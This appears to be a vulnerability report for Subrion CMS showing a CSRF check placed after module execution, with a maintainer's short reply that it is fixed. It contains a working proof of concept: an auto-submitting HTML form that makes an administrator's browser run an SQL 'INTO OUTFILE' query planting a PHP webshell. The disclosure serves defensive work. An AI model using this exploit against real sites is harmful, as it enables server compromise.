CSRF Token Bypass because of code logic error.

[Xmansec]

There are CSRF vulnerabilities At Subrion CMS because of code logic error.Although the check function is set in the program, its location does not appear to be correct in ia.core.php.

$this->_defineModule();
$this->iaView->defineOutput();
$this->_checkPermissions();
$this->_executeModule();
$this->_forgeryCheck();

_forgeryCheck() should be executed first and then _executeModule().
For example,we can use this vulnerability to get a webshell.First,we create a html page which can simulate the function of the SQL tool.

<HTML>
<BODY>
<form action="http://10.108.43.128/code/subrion/panel/database/" id="CSRF" method="post">
<input type="hidden" name="query" value="select '<?php phpinfo();?>' into outfile 'D:/phpStudy/WWW/code/subrion/shell.php';">
<input type="hidden" name="show_query" value="1">
<input type="hidden" name="exec_query" value="Go">
</form>
<script>
var f = document.getElementById("CSRF");
f.submit();
</script>
</BODY>
</HTML>

When the administrator visit the page, even though it will echo "Request treated as a potential CSRF attack.",the SQL statement has been executed and the webshell has been created.

[ghost]

Thanks for report, @Xmansec!
Fixed.